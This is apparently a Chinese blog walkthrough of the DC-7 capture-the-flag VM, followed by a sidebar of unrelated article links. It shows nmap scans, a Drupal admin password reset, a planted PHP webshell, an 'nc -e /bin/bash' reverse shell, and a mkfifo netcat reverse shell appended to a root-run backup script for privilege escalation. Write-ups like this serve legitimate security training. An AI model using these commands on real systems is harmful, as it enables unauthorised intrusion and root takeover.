当前位置:网站首页>DC-7靶机
DC-7靶机
2022-07-07 00:52:00 【m0_62094846】
ifconfig
查找主机IP
扫一波内网,探测下存活主机
nmap 192.168.61.0/24
使用nmap工具对DC-5靶机扫描开放的端口
nmap -A -T4 192.168.61.136 -p- -oN nmap136.A
nmap -A -T4 192.168.61.136 -p- -oN nmap136.A
有22和80端口
下面有提示DC7USER
百度一下
可以下载一个文件
这里也说明是重要点
下载到kali本地
git clone https://github.com/Dc7User/staffdb
cd staffdb
ls
cat config.php
使用SSH链接靶机,登录dc7user发现可以成功连接
ls
查到 backups mbox
backups下:website.sql.gpg website.tar.gz.gpg
发现两个文件,但都是以gpg结尾的,gpg命令是用来加密文件的,加密后的文件都是乱码
mbox是个文件
发现备份执行的源码在/opt/scripts目录下
进入/opt/scripts目录下
cd /opt/scripts
查看文件
cat backups.sh
发现两个命令 gpg drush
gpg命令用来加密,drush命令是drupal框架中用来做一些配置的命令,它可以改变用户名密码
进入到/var/www/html目录下,因为网站会有一个admin用户,所以使用drush命令修改admin用户的密码为123456,发现可以修改成功
cd /var/www/html/
drush user-password admin --password="123456"
admin的密码改成了123456
用dirb命令扫出页面
dirb http://192.168.61.136
在Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但是发现不支持PHP
百度后知道,php要单独作为一个模块导入
PHP的模块下载地址:
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
勾选,然后点最下面的install
然后就可以了
回到当时的页面,就可以使用PHP了
用蚁剑就可以连接成功了
然后用kali监听
nc -lvvp 4444
nc -e /bin/bash 192.168.61.129 4444
python -c 'import pty;pty.spawn("/bin/bash")'
连接成功
find / -name backups.sh 2>/dev/null
然后
cd /opt/scripts
ls -l
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.61.129 7777 >/tmp/f" >> backups.sh
nc -lvvp 7777
得到了root权限
cd /root
ls
cat theflag.txt
边栏推荐
- R language [logic control] [mathematical operation]
- Introduction to yarn (one article is enough)
- 毕业之后才知道的——知网查重原理以及降重举例
- CMD permanently delete specified folders and files
- 如何提高网站权重
- Reading notes of Clickhouse principle analysis and Application Practice (6)
- Go 語言的 Context 詳解
- [InstallShield] Introduction
- 绕过open_basedir
- Modes of optical fiber - single mode and multimode
猜你喜欢
PowerPivot - DAX (function)
[daily training -- Tencent selected 50] 235 Nearest common ancestor of binary search tree
一个简单的代数问题的求解
I didn't know it until I graduated -- the principle of HowNet duplication check and examples of weight reduction
[InstallShield] Introduction
Go语学习笔记 - gorm使用 - gorm处理错误 | Web框架Gin(十)
软件测试面试技巧
Determine whether the file is a DICOM file
Interview skills of software testing
Digital IC interview summary (interview experience sharing of large manufacturers)
随机推荐
Realize GDB remote debugging function between different network segments
Add salt and pepper noise or Gaussian noise to the picture
Go 語言的 Context 詳解
软件测试面试技巧
[SQL practice] a SQL statistics of epidemic distribution across the country
cf:C. Column Swapping【排序 + 模拟】
R语言【逻辑控制】【数学运算】
老板总问我进展,是不信任我吗?(你觉得呢)
What is make makefile cmake qmake and what is the difference?
Input of native applet switches between text and password types
404 not found service cannot be reached in SAP WebService test
PTA ladder game exercise set l2-002 linked list de duplication
Storage of dental stem cells (to be continued)
[daily training -- Tencent selected 50] 235 Nearest common ancestor of binary search tree
Digital IC interview summary (interview experience sharing of large manufacturers)
Jstat of JVM command: View JVM statistics
一名普通学生的大一总结【不知我等是愚是狂,唯知一路向前奔驰】
What is message queuing?
JVM命令之 jstack:打印JVM中线程快照
从“跑分神器”到数据平台,鲁大师开启演进之路